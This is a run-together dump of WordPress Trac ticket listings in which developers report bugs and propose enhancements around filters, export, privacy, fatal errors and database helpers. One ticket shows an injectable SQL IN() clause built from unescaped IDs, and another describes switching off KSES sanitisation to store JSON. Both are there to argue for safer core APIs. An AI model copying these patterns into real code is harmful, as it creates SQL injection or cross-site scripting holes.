2023-07-19T22:10:58Z 2024-01-30T14:39:56Z "Follow up from: https://core.trac.wordpress.org/ticket/57487#comment:71. The (new in 6.3) `wp_is_development_mode()` helper function cannot be used to check whether a development mode is enabled or not. It can only check for a particular development mode setting: either plugin, theme or core. Being able to check whether a development mode is enabled or not will enhance the above function and improve consistency. Currently this can be achieved by using the returned value from `wp_get_development_mode()` as boolean." azaozz Future Releases 43740 Filter WP_Post methods (vs. removing final/'get_post' filter) Posts, Post Types normal normal Awaiting Review enhancement new dev-feedback 2018-04-11T21:33:26Z 2020-02-27T11:09:37Z "There has been a lot of demand to remove `final` from `WP_Post` and to add a `get_post` filter, for good reason. There as also be a lot of pushback on those actions, also for very good reason. Both sets of reasons can be found in ticket #24672 and #12955, respectively. In a nutshell for, there are many valid use-cases where being able to extend `WP_Post` would make for more robust and maintainable code. In the against case, removing `'final'` could easily resolve in an explosion of incompatible child classes making plugin interoperability challenging, and backward compatibility almost impossible if code decided to evolve WP_Post in any way. And the `'get_post'` filter would be almost as bad as removing `final`, and I am one who advocated for both for years. However, we actually already have an extensibility mechanism that has shown the test of time and that is the use of filter hooks. Given a judicious use of filter hooks we could actually allow developers to extend `WP_Post` in a compossible manner thus minimizing plugin integration problems and also safeguarding core's ability to add enhancements in the future. The proposal is basically to add filter hooks in the methods of `WP_Post`, and to add a `__set()` and `__call()` magic method as a companion to the existing `__get()` magic method. Here are the filters I am proposing: ||= Filter Hook=||=Method=|| || `'wp_post_supports_instance'` || `__construct()`|| || `'pre_wp_post__isset'` ||`__isset()`|| || `'wp_post__isset'` ||`__isset()` || || `'wp_post__call'` || `__call()` || || `'wp_post__set'` || `__set()` || || `'pre_wp_post__get'` || `__get()` || || `'wp_post_filter'` ||`filter()` || || `'wp_post_to_array'` || `to_array()` || And then this action hook: * `'wp_post__construct'` in `__construct()` I have attached a patch for `class-wp-post.php` that would implement these hooks." MikeSchinkel Future Releases 40176 Filter user_trailingslashit called with inconsistent $type_of_string for Post-Tags Permalinks 4.7.3 normal normal Awaiting Review defect (bug) new dev-feedback 2017-03-16T22:32:05Z 2021-06-07T10:00:27Z "It seems to be a general inconsistency issue with the handling of post-tags in combination with the user_trailingslashit function/filter. Assumption: `$type_of_string` should be consitent and of type **tag** or **post_tag** == Testcase == Permalink Structure with Trailing-Slash: {{{ /%year%/%monthnum%/%day%/%postname%/ }}} === Testcode to produce debug output === {{{#!php // disable canoncial redirects add_action('redirect_canonical', '__return_false'); // show all events with tag/ urls add_filter('user_trailingslashit', function($string, $type_of_url){ if (strpos($string, 'tag/') !== false){ echo 'Tag Link: ', $string, ' of type ', $type_of_url, PHP_EOL; } }, 100, 2); }}} == Expected behaviour == Outputs like **Tag Link: /tag/mytag1/ of type post_tag** everytimes the url is of type **Tag** == Current behaviour == On Post Pages: **Tag Link: /tag/mytag1/ of type category** for related post-tag links On Canoncial Redirects: **Tag Link: /tag/mytag1/ of type category** AND **Tag Link: /tag/mytag1/ of type** (not set!) == Identified Issues == **wp-includes/canoncial.php** line 425 its not checked if current page if of type **tag** {{{#!php foreach ( array('single', 'category', 'page', 'day', 'month', 'year', 'home') as $type ) { }}} **wp-includes/taxonomy.php** line 3882 the `$type_of_string` variable is set to **category** by default instead of `$taxonomy` {{{#!php $termlink = home_url( user_trailingslashit($termlink, 'category') ); }}} " Andi Dittrich Future Releases 60529 "Filter to disable ""password reset""" Login and Registration normal normal Awaiting Review defect (bug) new dev-feedback 2024-02-13T16:58:45Z 2024-02-20T11:39:48Z "there is existing filter `allow_password_reset` which doesn't work as it might sound.. For example, setting that filter to `false` still allows the ""wp-login.php?action=lostpassword"" url continue to work. Many people today uses 3rd party authorizations (Google sign in, facebook, etc etc) and want to have disabled internal registration/password reset forms. It will be good to have a filter to disable ""Lost password"" capability completely. (Also, I assumed that if users are allowed to be registered on site, then it doesn't have any point to have ""Lost password"" disabled, so, the check includes whether ""registration is disabled"".)" ttodua Future Releases 10275 Filter logic has been put into the template loader while it not belongs there. Themes 2.8 normal normal defect (bug) reopened dev-feedback 2009-06-25T20:22:34Z 2019-06-04T21:05:33Z "Some time ago, filter logic has been introduced in the template-loader. Looks like a fix for the inability to handle attachments propperly (WP misses more and more a strict request parsing so that newer features tend to introduce more and more bugs). The code has not been removed yet. It should be removed there or put into a more appropriate location. The code in question is: {{{ remove_filter('the_content', 'prepend_attachment'); }}} in /wp-inclueds/template-loader.php around line 30." hakre Future Releases 13239 Filter locate_template template_names variable Themes 3.0 normal normal Future Release enhancement reopened dev-feedback 2010-05-03T21:43:05Z 2023-12-29T13:48:26Z "I recently encountered a situation where it would be very helpful to supply alternate template file locations; however, this cannot be accomplished as the locate_template function is being used and that function's arguments are not filterable. So, I created a patch that adds the filter. This patch adds two filters: locate_template and locate_template-TEMPLATENAME. This allows for both general and specific filtering. The following example shows how this could be used to modify the location of a BuddyPress template file. {{{ function filter_member_header_template( $template ) { return dirname( __FILE__ ) . '/buddypress/members/single/member-header.php'; } add_filter( 'locate_template-members/single/member-header.php', 'filter_member_header_template' ); }}} While the value of this example is debatable as BuddyPress could be updated to support alternate template locations, the value of the patch itself is high. This opens up a new ability for plugins to modify template file locations, giving plugins a hook into the content rendering process without requiring themes to be modified." chrisjean Future Releases 40412 Filter for theme actions to add extra buttons. Themes 4.7.3 normal minor Awaiting Review feature request new dev-feedback 2017-04-11T10:52:34Z 2017-04-11T10:56:26Z "In theme preview window we not have any filter to add extra buttons. > Not major. We'll add this with JS. ----- In file `\wp-admin\themes.php` {{{ echo implode( ' ', $current_theme_actions ); }}} Maybe like this: {{{ echo implode( ' ', apply_filters( 'wp_current_theme_actions', $current_theme_actions ) ); }}} Screenshot: [[Image(http://bsf.io/-dxku)]] " Mahesh901122 Future Releases 57237 file_exists(): open_basedir restriction in effect. File(core/post-comments) is not within the allowed path(s) Editor normal critical Awaiting Review defect (bug) new dev-feedback 2022-11-30T21:22:36Z 2022-12-15T13:33:18Z "Hello, After updating wordpress to version 6.1.1 I see this php warning messages: {{{ Warning: file_exists(): open_basedir restriction in effect. File(core/post-comments) is not within the allowed path(s): (/data/web/virtuals/291601/virtual) in /data/web/virtuals/291601/virtual/www/wp-includes/blocks.php on line 532 Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/291601/virtual/www/wp-includes/blocks.php:532) in /data/web/virtuals/291601/virtual/www/wp-includes/pluggable.php on line 1416 Warning: Cannot modify header information - headers already sent by (output started at /data/web/virtuals/291601/virtual/www/wp-includes/blocks.php:532) in /data/web/virtuals/291601/virtual/www/wp-includes/pluggable.php on line 1419 }}} I can't get into admin. I use php 8.1.11. I try to rename all plugins via FTP, but nothing change. On my another testing website I see the same php warning messages, but I can reach the wordpress administration. So I tryed to disable all plugins and change theme to default ""Twenty Twenty-Two"" but nothing change. I am not the only one who suffer with these errors. Here for examle: https://stackoverflow.com/questions/74327979/wp-error-warning-file-exists-open-basedir-restriction-in-effect-filecore Thank you, David" davidki Future Releases 34083 Feed for post type should link to post type archive if available stevenkword Feeds normal normal Future Release enhancement assigned dev-feedback 2015-09-29T20:50:33Z 2017-03-17T19:16:03Z "This post type feed: https://yoast.com/dev-blog/feed/ has {{{ <link>https://yoast.com</link> }}} Even though that particular post type has a post type archive. IMHO, it should link to the post type archive `https://yoast.com/dev-blog/`. " joostdevalk Future Releases 58402 Featured Image Preview breaks when an SVG image is uploaded. Post Thumbnails normal normal Awaiting Review defect (bug) new dev-feedback 2023-05-25T09:26:43Z 2023-05-30T17:15:00Z "Steps to reproduce. Add a new post - set a featured image. Use an **SVG** as the featured image. The layout breaks inside **InspectorControls** It seems to be because the image tag returns 0 as its naturalWidth/naturalHeight. Reference for what seems to be the issue with SVG. https://bugzilla.mozilla.org/show_bug.cgi?id=1607081 **Note**: This can only be reproduced if, SVG image upload is enabled via functions.php. Since by default, WordPress doesn’t allow SVG upload." deepakvijayan Future Releases 20947 feature request: one-click update for core, themes and plugins (all in one) Upgrade/Install normal normal Awaiting Review feature request new dev-feedback 2012-06-13T22:48:50Z 2018-08-13T17:00:35Z I'd love to have the one-click update be truly one-click so that you can click once and update core, themes and plugins all at once as opposed to having to initiate three different updates. jkudish Future Releases 40320 Feature idea: Rename roles Role/Capability 4.8 normal normal Awaiting Review enhancement new dev-feedback 2017-03-30T21:16:48Z 2023-02-02T16:11:56Z "There are some help topics available online where users manipulate the role names (not the slug but the display label). Why not make a simple helper function rename_role() for this?" keraweb Future Releases 47974 Fatal error without explanation General 5.2.2 normal normal Awaiting Review defect (bug) new close 2019-09-04T16:30:54Z 2024-02-26T22:27:31Z "Hello, Today, sudenly wp-admin return this error https://prnt.sc/p1sz3t I discoverd is from digitalaccespass plugin. if i disable it, wp admin works ok. Now, the strange thing is that dap dont work even if i disable all plugins/all themes So it something related to this site. What disturbs me and is not the first time is that i dont receive an email with the error. The message says it was send an email to administrator, but i dont receive any email. I also enabled debug but no info there . How can i help you to make send emails with fatal error every time? Also, is there anything i can do to find the error? Thank you" cristianciuberea Future Releases 54546 Fatal error receive while updating WP 5.8.2 to WP 5.9. Upgrade/Install 5.9 normal normal Future Release defect (bug) new dev-feedback 2021-12-01T06:07:41Z 2022-08-30T10:11:49Z "After updating to 5.9-beta1 via the [https://wordpress.org/plugins/wordpress-beta-tester/ Beta Tester plugin], I got the below error https://content.screencast.com/users/ApekshaShah/folders/Capture/media/8b2bed1a-ca74-4ebc-83c0-c2bb7d0c0eb3/LWR_Recording.png {{{ Fatal error: Uncaught Error: Class 'Requests_Exception' not found in C:\Users\User\Local Sites\first-localhost\app\public\wp-includes\Requests\Transport\cURL.php on line 443 }}} I also updated a few other sites on my local machine and I'm getting that error on the other sites. Full information: {{{ Unpacking the update... Verifying the unpacked files... Preparing to install the latest version... Enabling Maintenance mode... Copying the required files... Disabling Maintenance mode... Upgrading database... Fatal error: Uncaught Error: Class 'Requests_Exception' not found in C:\Users\User\Local Sites\first-localhost\app\public\wp-includes\Requests\Transport\cURL.php on line 443 Error: Class 'Requests_Exception' not found in C:\Users\User\Local Sites\first-localhost\app\public\wp-includes\Requests\Transport\cURL.php on line 443 }}} Call Stack: ||= # =||= Function =||= Location =|| || 1 || `{main}{}` || ..\update-core.php:0 || || 2 || `do_core_upgrade()` || ..\update-core.php:1106 || || 3 || `Core_Upgrader->upgrade()` || ..\update-core.php:887 || || 4 || `update_core()` || ..\class-core-upgrader.php:172 || || 5 || `wp_remote_post()` || ..\update-core.php:1409 || || 6 || `WP_Http->post()` || ..\http.php:179 || || 7 || `WP_Http->request()` || ..\http.php:608 || || 8 || `Requests->request()` || ..\class-http.php:394 || || 9 || `Requests_Transport_cURL->request()` || ..\class-requests.php:381 || || 10 || `Requests_Transport_cURL->process_response()` || ..\cURL.php:179 ||" apeksha10 Future Releases 56431 Fatal Error on Update Page When a Plugin's Icon is Not Set Upgrade/Install normal normal Awaiting Review defect (bug) new dev-feedback 2022-08-24T17:04:02Z 2024-02-28T20:06:23Z "When on the Dashboard > Updates page, if there is a plugin whose icon is not set, a fatal error is generated, and no plugins are listed in the update section. `PHP Fatal error: Uncaught Error: Cannot use object of type stdClass as array in /wp-admin/update-core.php:509` I have often seen this with plugins that are not hosted on wordpress.org. Mostly this is when you have a paid plugin that doesn't have an icon set. I think the fix should be as follows: `wp-admin/update-core.php` line 509: `if ( ! empty( $plugin_data->update->icons[ $preferred_icon ] ) ) {` should change to: `if ( is_array( $plugin_data->update->icons ) && ! empty( $plugin_data->update->icons[ $preferred_icon ] ) ) {` " scott.deluzio Future Releases 38715 Facilitate posts storing raw JSON in post_content by short-circuiting KSES and other filters Posts, Post Types normal normal Future Release enhancement new dev-feedback 2016-11-08T21:55:55Z 2019-03-26T07:59:01Z "When attempting to store arbitrary JSON in WordPress, the `post_content` field is the logical choice. Using `post_content` to store arbitrary JSON instead of postmeta is more performant and it also means that the JSON content will automatically get support for revisions. Storing JSON is done in core now for `customize_changeset` posts and it is done in the `widget_instance` post type in the Customize Widgets Plus plugin. In both cases, however, there are challenges when storing the JSON due to filters that may apply on `content_save_pre`. In particular, the KSES filters will apply on the `post_content` and strip out markup that is intended to be contained within JSON strings. The solution taken by changesets is to wrap the updates to the `customize_changeset` post type by the `\WP_Customize_Manager::save_changeset_post()` method. Before this method calls `wp_update_post()`/`wp_insert_post()` it suspends the KSES filters temporarily: {{{#!php <?php $has_kses = ( false !== has_filter( 'content_save_pre', 'wp_filter_post_kses' ) ); if ( $has_kses ) { kses_remove_filters(); // Prevent KSES from corrupting JSON in post_content. } wp_update_post( /*...*/ ); if ( $has_kses ) { kses_init_filters(); } }}} This works, however it is ugly. It also means that post updates via WP-CLI and via the REST API won't work as expected because the filters won't be suspended as in this wrapper method. One idea is that we could introduce a new `post_type_support` for `json_content`, and when the post type supports that, it could bypass any `content_save_pre` filters applying. See also #15515." westonruter Future Releases 14991 extra_rules_top should take priority over extra_permastructs Rewrite Rules 3.1 normal normal defect (bug) new needs-unit-tests 2010-09-29T18:00:08Z 2022-12-05T12:09:28Z Since extra_rules_top are specifically added instead of generated like the those from the extra_permastructs which runs through generate_rewrite_ruls(), shouldn't the extra_rules_top take priority in conflicts? prettyboymp Future Releases 54042 Extending wpdb::prepare() to support IN() operator Database normal normal Future Release enhancement new changes-requested 2021-08-31T14:23:26Z 2023-09-17T10:53:12Z "wpdb::prepare() helps avoid SQL Injection vulnerabilities, by escaping most variables correctly. WP 6.1 added support for Identifiers (table/field names) with `%i`, in #52506. But it's also fairly common to make a mistake to include values with the `IN()` operator, for example: {{{#!php <?php $where = 'WHERE id IN (' . implode( ',', $ids ) . ')'; // INSECURE? }}} Developers need to be sure `$ids` has come from a trusted source, or use something like `wp_parse_id_list()` or `array_map('intval', $ids)`. ---- Maybe support could be added with: {{{#!php <?php $wpdb->prepare('WHERE id IN (%...d)', $ids); }}} Where `%...d` or `%...s` would safely (and easily) include a comma separated array of integers or strings - taking the idea of using '...' for variadics in PHP. https://wiki.php.net/rfc/variadics https://www.php.net/manual/en/functions.arguments.php#functions.variable-arg-list https://dev.mysql.com/doc/refman/8.0/en/comparison-operators.html#operator_in" craigfrancis Future Releases 36030 Expose site icon on wp.getUsersBlogs XML-RPC normal normal Future Release enhancement new needs-unit-tests 2016-03-01T09:06:46Z 2019-06-20T14:07:35Z "WordPress 4.3 has added the ability for site owners to manage their site’s favicon, but never exposed it over the XML-RPC protocol. It's useful for XML-RPC clients to receive it back in the response of wp.getUsersBlogs, so they can show the proper icon beside the name of the site. In the patch I've provided an empty value is returned if site_icon is not set on the blog. I've avoided returning a default value, since it's better to leave this responsibility to clients. If siteIcon is empty, the client should show their default icon, or nothing." daniloercoli Future Releases 28185 Expose image attachment title and/or filename in the image details modal Media 3.9 normal normal enhancement new dev-feedback 2014-05-08T23:46:33Z 2019-06-04T20:07:41Z "I ran into a case where I had a post with an image I wanted to set as the featured thumbnail. My Media library is very large and I didn't know the file name so I clicked the edit icon on the image to view the Image Details. Nowhere within the image details does it show either the image title, or file name. My suggestion would be to place it next to the words ""Image Details"", but i'm not married to the idea. The search field in the media library looks for these attributes to filter the library list, it would be convenient if it were clearly labelled within the ""Image Details"" modal. Additionally, once you do find the image in the media library, both the file name and image title are clearly visible. I created an annotated video to clearly explain the issue: https://www.youtube.com/watch?v=lS55abTV7qc" drrobotnik Future Releases 53603 Expose block data directly through REST API endpoints REST API 5.8 normal normal Future Release enhancement new dev-feedback 2021-07-06T10:05:57Z 2021-08-01T11:53:50Z "Part of ""PHP APIs Overview"" in Gutenberg: https://github.com/WordPress/gutenberg/issues/8352. Originally reported in https://github.com/WordPress/gutenberg/issues/4763 by @adamsilverstein. > Consider adding Gutenberg block data to the post endpoints - so when retrieving a post via the REST API you could get the block data as part of the content object. > > This provides a way to get the data/content of each block of a Gutenberg-built page from the front end. This would be very useful for building component based front ends, because the components could map one-to-one with gutenberg blocks. With these endpoints, an App could easily get the data it needs to render each component. This might also provide a patch for a standard component library matching Gutenberg blocks. > > POC PR for this: https://github.com/WordPress/gutenberg/pull/2649 Related ticket with changes proposed to `get_posts` function: #53602." gziolo Future Releases 44261 Export User Data includes media URLs, not the actual media files in zip file Privacy 4.9.6 normal normal Awaiting Review enhancement new dev-feedback 2018-05-29T14:06:16Z 2020-10-16T22:44:17Z "Use of media URLs rather than the media files in original in Exported User Data zip file is probably to keep the file small in size so that it could be transferred quickly. **But what if admin or any user with the same level of privilege can delete one of more media files of the user requesting a personal data export accidentally after the Export is initiated and is emailed / downloaded. ** Do we already have a guard or option to deal with such a situation? Is this possible to include the physical media files in the zip or at least create a separate area where these files would be backed up and reference URLs point to this location? We can warn user (in the same email with the download link) to download the file say within next 72 hours otherwise the download link would expire. In the background after the stipulated time period the backup would be erased automatically. A new request needs to be initiated if this happens. This will make sure that the server space is not being overused for a longer period of time. How far you see the possibility of accidental deletion and user ends up with broken media link(s)? Do you think this could be a probable solution to avoid such a situation?" subrataemfluence Future Releases 36818 Export filter for post meta Export normal normal enhancement new dev-feedback 2016-05-11T20:00:14Z 2019-06-04T19:58:11Z "It would be handy if we had a filter for modifying post meta before it is written to an export file. Our plugin stores serialized arrays in post meta that get corrupted from time to time during the export/import process. The attached patch/filter would allow us to store the data differently in an export file to prevent that from happening. " justinbusa Future Releases 34798 Export Bug Export normal normal Awaiting Review defect (bug) new dev-feedback 2015-11-27T05:00:43Z 2017-10-03T07:52:59Z " We found a bug in export process that prevents post data changes going to actual export. In wp\wp-admin\includes\export.php L416 you select all matching posts from DB, having $posts array of stdClass objects as result. Then you call setup_postdata for every post, that goes to wp\wo-includes\query.php setup_postdata which calls $wp_query->setup_postdata after passing the $post. In function setup_postdata L4754 you check instance of the $post which will always be stdClass and create a new $post object. It breaks the reference link original $post from export.php so all changes in function setup_postdata will not be reflected to original object. A possible fix would be converting $post object to WP_Post before calling setup_postdata in expost.php Please see patch attached " eugenekireev Future Releases 22435 Export API Export normal normal Future Release enhancement new dev-feedback 2012-11-13T16:41:55Z 2017-12-13T21:26:06Z "From experience and from tickets (#19864, #19307, #17379) it's evident that we need to update the export API. High level goals: * To be usable from different parts of the code. From the web backend, from a CLI script, from an async job. * To allow more control of the output format – serve over HTTP, write a single XML file to disk, split it and write many smaller XML files, write a big zip with many XML files, etc. * To allow exporting the data without querying all the posts at once, so that we can fit the exports to memory. * Keep {{{export_wp()}}} for backwards compatibility without the need to keep all (even any) of its code. Here's my idea for the part of the API 99% of the developers touching export would use and be happy: {{{ #!php <?php // WP_WXR_Export is an aimmutable representing all the data needed for the export and allows us to have it in multiple formats $export = new WP_WXR_Export( array( 'start_date' => '2011-10-10', 'post_type' => 'event', … ) ); backup( $export->get_xml() ); // string $export->export_to_xml_file( 'mom.xml' ); send_to_mom_to_import( 'mom.xml'); $export->serve_xml(); // with all the headers and stuff $export->export_to_xml_files( '/files/exports-for-my-awesome-website/', 'export-%02d.wxr.xml', 5 * MB_IN_BYTES ); }}} Before I dive into implementation details (in the comments, not to pollute the ticket), I'd like to hear what use cases for extending this code you have in mind and where should we draw the line. Adding more output writers? Adding custom export data? Adding formats different from WXR? " nbachiyski Future Releases 44683 Export and Erase personal data - emails sent to wrong address if username is an email address which is different from the actual email address xkon Privacy 4.9.6 normal normal Future Release enhancement reviewing dev-feedback 2018-07-31T13:28:29Z 2021-01-27T18:05:13Z "This issue might had been already discussed in another ticket but I was unable to find it. When a user has set his username to an email address (may not be a valid one), then WordPress will be forced to send the verification request to wrong one. Here is an example: Username: `fake@bbbb.com` For the above, the following code block won't execute: {{{ if ( ! is_email( $username_or_email_address ) ) { ... } }}} but this line will be executed: {{{ $email_address = $username_or_email_address; }}} Which means email is now supposed to be sent at `fake@bbbb.com`. I would suggest even a username looks to have a valid email address pattern like above, rather than directly assign it against `$email_address` variable, we might take an extra step to find the real email address attached to this account before sending the request. Here is a suggestion: {{{#!php <?php if ( ! is_email( $username_or_email_address ) ) { ... } else { $user = get_user_by( 'login', $username_or_email_address ); if ( $user instanceof WP_User ) { $email_address = $user->user_email; } else { $email_address = $username_or_email_address; } } }}} Please let me know if this makes any sense!" subrataemfluence Future Releases 44161 Expired session tokens need to be removed from database because GDPR Privacy 4.9.6 normal normal Awaiting Review enhancement new dev-feedback 2018-05-20T15:12:32Z 2019-01-17T07:42:47Z "WordPress stores the IP address (which is considered personal information) as part of its session tokens in the usermeta table. When the session expires, GDPR would seem to require the IP address to be removed from the database, as there is no longer a reason to keep it. There should be some kind of garbage collection that removes expired session tokens on a daily basis." mechter Future Releases 60781 Expand or modify wp_get_environment_type function to allow more environment types Bootstrap/Load 5.5.1 normal normal Awaiting Review enhancement new dev-feedback 2024-03-15T09:49:27Z 2024-03-15T11:29:04Z "Currently the [https://developer.wordpress.org/reference/functions/wp_get_environment_type/ wp_get_environment_type()] function only allows 4 environment types: {{{#!php $wp_environments = array( 'local', 'development', 'staging', 'production', ); }}} But there are projects that have multiple environment types (CI, CD, pre-production, UAT, etc.). So if you define the `WP_ENVIRONMENT_TYPE` to anything outside of these 4 environments, you'll end up with serving the `production` environment. A trivial example would be where you'd like to change the color of your admin UI based on environments. I mean, sure you can use something like {{{defined('WP_ENVIRONMENT_TYPE') ? WP_ENVIRONMENT_TYPE : 'production'}}}, but what's the point of the `wp_get_environment_type` function then? One alternative is to expand the `$wp_environments` variable with some of the industry most-used terms. Or just remove this check, and just return the value of `defined('WP_ENVIRONMENT_TYPE') ? WP_ENVIRONMENT_TYPE : 'production'` check." dingo_d Future Releases 9257 EXIF GPS data Media 2.7 normal normal Awaiting Review enhancement assigned dev-feedback 2009-03-01T19:30:17Z 2024-03-06T16:33:55Z "Attached patch adds GPS longitude and latitude to image meta data. Changed: wp_read_image_metadata function (file: wp-admin/includes/image.php). It complies with exif standard: [http://www.exif.org/Exif2-2.PDF] (page 46) Commented on wp-hackers list: [http://comox.textdrive.com/pipermail/wp-hackers/2009-March/025093.html]" B-Scan Future Releases 56137 Excerpt in Quick Edit Quick/Bulk Edit normal normal Awaiting Review enhancement new dev-feedback 2022-07-05T00:32:54Z 2022-11-30T20:43:46Z "Pretty simple request and hoping to see it in a future version of WordPress: the ability to edit the excerpt in the Quick Edit screen on the Posts page. Seems everything else, including Tags, can be edited there, so why not the Excerpt? Thanks!" saladgoat Future Releases 56118 Exception to escapement: Exported or imported data Export normal major Awaiting Review feature request new needs-docs 2022-07-01T02:21:19Z 2022-07-01T02:21:19Z "JSON data echoed for download as in https://plugins.trac.wordpress.org/browser/anrghg/tags/1.3.1/admin/includes/export.php?rev=2749921#L327 cannot be escaped using `wp_kses()`. I’m opening this ticket for documentation purposes. `wp_kses()` calls `wp_kses_split()`, that calls `_wp_kses_split_callback()`, that calls `wp_kses_split2()` (https://docs.classicpress.net/reference/functions/_wp_kses_split_callback/). And the first thing `wp_kses_split2()` does is to “fix” the data by calling `wp_kses_stripslashes()`, that strips backslashes from in front of double quotes (https://docs.classicpress.net/reference/functions/wp_kses_split2/ and https://developer.wordpress.org/reference/functions/wp_kses_stripslashes/) and thus breaks JSON. Anyway, cxported data is expected to truly mirror the existing data, so there seems to be no way to escape anything here when echoing for download. The same holds true when importing data as in https://plugins.trac.wordpress.org/browser/anrghg/tags/1.3.1/admin/includes/import.php?rev=2749921#L362 For PHPCS, such instances need to be whitelisted and I’m held accountable for linking to relevant documentation acknowledging the exceptions." anrghg Future Releases 58303 Escape $columns_css variable in dashboard widget Administration normal normal Awaiting Review enhancement new dev-feedback 2023-05-13T10:40:29Z 2023-05-26T00:43:20Z "While examining the [https://github.com/WordPress/wordpress-develop/blob/trunk/src/wp-admin/includes/dashboard.php#L269 \wp-admin\includes\dashboard.php] file in WordPress, I discovered an escaping issue when echoing a dynamic value of an attribute (such as ""class"") in an HTML attribute. Specifically, the issue is located on line 269 of that file. Based on my observation, I believe that the dynamic value should be properly escaped to prevent potential syntax errors or security vulnerabilities." mahamudur78 Future Releases 52779 Error with saved blocks Editor 5.7 normal normal Future Release defect (bug) new dev-feedback 2021-03-11T14:38:12Z 2021-08-30T20:36:18Z After update to WordPress 5.7 there is no possibility to use saved blocks without make changes in original bock. That's mean I would like to use saved block, make some changes when I've added it to the post and didn't make change in saved block – it is not posible now. Could you please give me a tip how to use previous option of using saved blocks? lumay Future Releases 60052 Error when deleting media if default taxonomies have been removed General 6.4.2 normal normal Awaiting Review defect (bug) reopened dev-feedback 2023-12-12T07:44:20Z 2024-03-07T04:39:20Z "Hello, I recently had a problem with deleting media from the media library. I received the following error message: 2151#0: *203114 FastCGI sent in stderr: ""PHP message: UM_TEST_ERROR_LOG PHP message: 63870 PHP message: ""category"" PHP message: UM_TEST_ERROR_LOG PHP message: 63870 PHP message: ""post_tag"" PHP message: PHP Fatal error: Uncaught TypeError: array_map(): Argument #2 ($array) must be of type array, WP_Error given in /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/taxonomy.php:1964 Stack trace: #0 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/taxonomy.php(1964): array_map() #1 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/post.php(6304): wp_delete_object_term_relationships() #2 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/post.php(3416): wp_delete_attachment() #3 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-admin/includes/ajax-actions.php(886): wp_delete_post() #4 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/class-wp-hook.php(324): wp_ajax_delete_post() #5 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/class-wp-hook.php(348): WP_Hook->apply_filters() #6 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-includes/plugin.php(517): WP_Hook->do_action() #7 /var/www/vhosts/fis-gmbh.de/stage.fis-gmbh.de/wp-admin/admin-ajax.php(1"" while reading response header from upstream This happened because we had used the following code elsewhere: add_action( 'init', 'deregister_tag' ); function deregister_tag() { global $wp_taxonomies; $tax = 'post_tag'; if ( taxonomy_exists( $tax ) ) { unset( $wp_taxonomies[ $tax ] ); } } This code ensures that the standard WordPress taxonomy 'post_tag' is no longer present (this was not necessary for this project). In wp-includes/post.php there is the following call: wp_delete_object_term_relationships( $post_id, array( 'category', 'post_tag' ) ); This call causes an error to occur if the taxonomy 'post_tag' is not present. I am of the opinion that this error should be caught in the WordPress core. This issue is also being discussed here at WPML: https://wpml.org/forums/topic/fatal-error-when-deleting-a-media/ Thank you." imatoni Future Releases 56234 error logged messages should not be translateable I18N normal normal Awaiting Review defect (bug) new close 2022-07-16T08:19:59Z 2023-05-25T13:55:25Z "e.g. `_doing_it_wrong`,... - general consensus for software is that errors in logs should always be in English - these errors will only show with `WP_DEBUG` enabled, therefore a development errors and developers who work with WP have to speak English, otherwise wouldn't be able to understand the code in the first place - even if you are not a developer but use `WP_DEBUG`, these are not issues you can fix yourself. You need to get in touch with your hoster, your developer, the plugin developer from where this error is from or even WP core. This is much easier if the error is in English and you can google it easily. Furthermore it's much easier to only receive these errors in English for the support who you contact - rather than in the 50 different supported languages by WP. - many (most?) plugins do not pass a translatable strings to these, which means you end up with a language mix-mash - when using a multi-lingual site, we (= the admin) get the error in all kinds of languages, we do not even speak (since the translations were created by contracted agencies). Making it unnecessarily hard to track down the exact English text, so we can check it in code. In some instances where these may be used translation may not be loaded yet (which is why we have a `function_exists( '__' )` check), which means that in some cases you end up with english errors anyway. The sensible thing to do is, to remove translations from error logged things all together. I'm happy to provide a PR. Related #53125 (and ticket:56198#comment:6 which made me open this ticket finally)" malthert Future Releases 57035 Error in current_time() function when using timestamp and no value for gmt_offset audrasjb Date/Time 5.3 normal normal 6.6 defect (bug) reopened dev-feedback 2022-11-08T13:28:40Z 2024-02-18T14:59:54Z "This may be a but of an edge case, but if the gmt_offset is not set correctly a string is returned and then used in math to multiply against HOUR_IN_SECONDS. In PHP 7 and earlier this is dismissed as a warning so processing continues, but in PHP 8 this throws a fatal error. It looks like the function has some typecasting, but it is placed in the wrong spot. {{{ // Don't use non-GMT timestamp, unless you know the difference and really need to. if ( 'timestamp' === $type || 'U' === $type ) { return $gmt ? time() : time() + (int) ( get_option( 'gmt_offset' ) * HOUR_IN_SECONDS ); } }}} Should be {{{ // Don't use non-GMT timestamp, unless you know the difference and really need to. if ( 'timestamp' === $type || 'U' === $type ) { return $gmt ? time() : time() + ( (int) get_option( 'gmt_offset' ) * HOUR_IN_SECONDS ); } }}} Again, this is potentially an edge case. Another ticket, #56358, was reported and closed when the user discovered a work around, but I think this fix is pretty simple and will solve for weird edge cases that can break sites in php8." Nick_theGeek Future Releases 16853 Error 500 when a user has too many sites Networks and Sites 3.0.1 normal minor Future Release enhancement assigned dev-feedback 2011-03-14T11:15:57Z 2019-04-08T16:52:29Z "'''My installation''' [[BR]] 3.0.1 multi-site installation with more than 7500 blogs, with one user each. I also have one moderation user that can administer each of the blogs. [[BR]] [[BR]] '''The issue''' [[BR]] In the admin interface, when I go to Super-Admin -> Users, and when I display the page that contains my moderation user, I get ""''An error (500 Internal Server Error) has occured in response to this request''"". The page tries to display all the sites administered by him (around 7500 of them), hence the error. [[BR]] [[BR]] Updating to 3.1 didn't resolve the problem. [[BR]] [[BR]] '''Recommended enhancement''' [[BR]] For each user in the list, display only a certain number of sites, with a possibility to see all of that user's sites, if needed." luuzan@… Future Releases 46905 Erase Personal Data without verify enable erase option and change status issue Privacy normal normal Awaiting Review defect (bug) new dev-feedback 2019-04-13T06:41:39Z 2019-04-15T05:13:16Z "Erase Personal Data 1) without verify request enable erase data option 2) Personal data but when erase data then display massage no personal data. 3) pending request change status completed when erase data without verify. See attached images 1) No personal data issue.png 2) change status automatically without varify.png 3) completed status.png" mehulwpos Future Releases 55140 Erase Personal Data Email Validation Issue Privacy normal 